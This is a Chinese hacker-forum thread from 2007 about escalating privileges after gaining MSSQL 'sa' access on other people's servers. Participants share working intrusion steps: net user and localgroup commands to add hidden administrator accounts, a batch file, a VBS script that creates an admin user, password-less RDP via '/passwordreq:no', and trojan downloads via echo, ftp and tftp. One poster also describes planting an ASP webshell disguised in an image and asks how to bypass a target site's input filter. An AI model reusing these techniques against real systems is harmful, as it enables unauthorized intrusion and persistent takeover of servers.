我在想既然是sa在连接数据库,应该能找到他的数据库的连接文件吧?去找下账户密码。再用sqltools连上去咯。 [s:263][/quote]
在用sqlrootkit连接执行命令的,不过权限不足以拿到服务器权限! [s:264] whoami 我是谁啊?哈 我是users啊,不是 system 呵呵刚才也搞到一个SA的,SU提都上不去.
net.exe net1.exe都被设死了...拒绝访问...
实在想不出办法了...最后
del c:\windows\system32\net.exe
结果在执行 net user riB meiqian /add
居然成功了.... [s:269] [quote]引用第52楼hack520于2007-05-27 23:36发表的 :
[s:264] whoami 我是谁啊?哈 我是users啊,不是 system[/quote]
猪三哥的解释真有趣,通俗易懂![s:264] [quote]引用第53楼白老会于2007-05-27 23:57发表的 :
呵呵刚才也搞到一个SA的,SU提都上不去.
net.exe net1.exe都被设死了...拒绝访问...
实在想不出办法了...最后
del c:windowssystem32net.exe
结果在执行 net user riB meiqian /add
.......[/quote]
删除后系统会自动恢复的,权限也会恢复到默认状态……[s:266] 发生系统错误 5。
拒绝访问。
遇到这个问题多了,具体问题出现原因不知道,
但是实际遇到过,过了几天 这种情况自动没有了,
还有就是 在win 2000上对注册表 sam设置权限时候 删除 administrator 以及 system
就会出现
发生系统错误 5。
拒绝访问。
具体不知道,只是自己也遇到过相同问题! 用sc config 是不是可以设置服务以哪个帐户运行? 找些启动过程中调用的EXE或者经常使用的软件改名字或许可以,比如瑞星、WINRAR什么的 [quote]引用第20楼hackest于2007-05-27 10:23发表的 :
我也认为不是SA被降权,起码它可以调用xp_cmdshell嘛
echo貌似可以用:
.......[/quote]
貌似你忽略了一点:
MSSQL里的sa ,只是在整个MSSQL里面是权限最大的;
xp_cmdshell再怎么讲,也只是MSSQL里的东西;
而且管理员可以在企业管理器里面设定MSSQL的启动账号,如果他建立一个账号给MSSQL运行,users组的,那就算是sa又怎么样呢? 貌似是管理员把帐号设置在拉user下。
MYSQL设置在拉USER权限你拿拉SA也没用的。 [s:270] [s:270] [quote]引用第58楼nixilin于2007-06-30 20:09发表的 :
貌似你忽略了一点:
MSSQL里的sa ,只是在整个MSSQL里面是权限最大的;
xp_cmdshell再怎么讲,也只是MSSQL里的东西;
.......[/quote]
现在弄明白的了,嘿嘿
换句话说就是:
SA在MSSQL里是最高权限的
它可以调用xp_cmdshell等存储过程
如果MSSQL以系统权限启动
那SA就几乎等于系统权限
如果MSSQL以users权限启动
那SA的最高境界也不过是users组用户而已
与系统下的普通用户组的用户权限一样
是无法添加系统用户的!
[s:266] 既然net user /add还有更改密码都没有权限,试试
net user administrator /passwordreq:no
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了....可以试试...
貌似这个方法还没成功过 上传的exe不能运行
这个有办法解决么? 引用第30楼wyzhack于2007-05-27 10:40发表的 :
难道所有的系统文件都在system32下?
不理你,静说些废话
汗。。难道杀毒 SQL下的都会装在SYSTEM32下的么? lz不好意思,因为没有权限在这里发新帖,所以只好借个地儿
我的情况是这样的:sa权限的内网服务器,可以列目录,用啊d和nbsi均无法执行命令,hdsi可以执行命令,但是回显有点补正常.于是我试着用hdsi来echo我的ftp或者vbs来进行下载木马,但是echo后发现重复写入了,这个问题我倒还能解决.整理好下载文本后我开始执行命令,但是等了很久,文件还是无法下载下来.这种方法失败了我有开始找web目录,找到后写一句话,可是一句话始终无法echo进去.后来查看了一下文件,安装的是kingsoft,我不知道杀补杀.后来我又尝试tftp,还是以失败告终.于是我开始寻找web页面上的上传,发现了一处提交产品的地方可以上传图片,我将asp木马改后缀上传,无法上传,然后用一张正确的图片上传,成功.于是我在正常的图片文件里用文本编辑的方式将一句话写进去,上传,失败...再试着日志备份获得一句话,但是执行到第三句的时候又失败,显示提交非法字符,我down了它的过滤方式如下:
==============================================
<%
function HTMLEncode1(fString)
fString = Replace(fString & "","★","")
fString = Replace(fString & "","■","")
'fString = Replace(fString & ""," "," ")
fString = Replace(fString & ""," ",chr(10))
'fString = Replace(fString & "","",CHR(13))
'fString = Replace(fString & "","<P>",CHR(10))
'fString = Replace(fString & "","</P>",CHR(10))
fString = Replace(fString & "","<BR>",chr(13))
'fString = Replace(fString & "","</P><P>",Chr(10) & Chr(10))
fString = Replace(fString & "",">",">")
fString = Replace(fString & "","<","<")
fString = Replace(fString & "","&","&")
fString = Replace(fString & "",""","""")
HTMLEncode1 = fString
end function
function HTMLEncode2(fString)
fString = Replace(fString, "★", "")
fString = Replace(fString, "■", "")
fString = Replace(fString, "<", "<")
fString = Replace(fString, ">", ">")
fString = Replace(fString, "'", "''")
fString = Replace(fString, "&", "&")
fString = Replace(fString, """", """)
fString = Replace(fString, chr(13),"<BR>")
'fString = Replace(fString, CHR(10) & CHR(10), "</P><P>")
fString = Replace(fString, chr(10)," ")
HTMLEncode2 = fString
end function
function CheckInput(inputstr)
inputstr1="|" & inputstr & "|"
InputDemo1="|" & InputDemo & "|"
if instr(InputDemo1,inputstr1)>0 then
%>
<script language=javascript>
alert("对不起,你发布的信息中含有非法字符,不能发布!")
parent.history.back();
</script>
<%
response.end
end if
Txt_subjectarray=split(trim(InputDemo),"|")
for i=0 to ubound(Txt_subjectarray)
Txt_subjectarrayid=trim(Txt_subjectarray(i))
if isnull(Txt_subjectarrayid)=false and Txt_subjectarrayid<>"" then
if instr(inputstr,Txt_subjectarrayid)>0 then
%>
<script language=javascript>
alert("对不起,你发布的信息中含有非法字符,不能发布!")
parent.history.back();
</script>
<%
response.end
end if
end if
next
End function
%>
======================================================
下面我应该怎么做,请教大家 通过批处理 加用户咯!
传个AA.BAT ECHO NET USER AA /ADD
NET LOCALGROUP ADMINISTRATORS AA /ADD
执行BAT! 开终端了没... 用copy 命令试试.. echo无法写入一句话?!
要带绝对路径的哦
操作上没错误哇…… 操作上肯定没有问题,这个点我好久没去看了,我先看看再向大家汇报 用 user.vbs 看看把
struser=wscript.arguments(0)
strpass=wscript.arguments(1)
set lp=createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",struser)
od.SetPassword strpass
od.SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
oe.Add(of.ADsPath)
For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & " 建立成功!"
wscript.quit
end if
Next
Wscript.echo struser & " 用户建立失败!"
cscript user.vbs yexu yexu 权限用Windows中的User组启动?以后服务器这样设置就很不错拉~ [s:264] [s:264]
谢谢hackest大色狼,找老婆~ [quote]引用第19楼cncxz于2007-05-27 10:20发表的 :
我觉得不太可能是SA被降权了,如果是被降权了,xp_CMDshell是无法执行的......
echo可不可以用?[/quote]
这是哪个牛人说的?
很有可能是user用户启动的mssql 但是cmdshell一样可以使用 不过也只有user权限罢了 sa沙盒还是不错得选择 可能是.dll文件改名了 我也遇到过这样得情况 沙盒直接解决(开3389得情况)
其实还可以用用nbsi得其他执行命令的执行下 [quote]引用第69楼aishell于2007-10-04 21:55发表的 :
用 user.vbs 看看把
struser=wscript.arguments(0)
strpass=wscript.arguments(1)
set lp=createObject("WSCRIPT.NETWORK")
.......[/quote]
既然是user权限。还可以执行vbs? 我也遇到62楼问题
上传了的EXE 文件 运行 无任何提示
程序直接卡死...只能结束任务..
用 WHOAMI 看 是 SYSTEM 啊
奇怪了 试着用其他的马
php.aspx
页:
1
[2]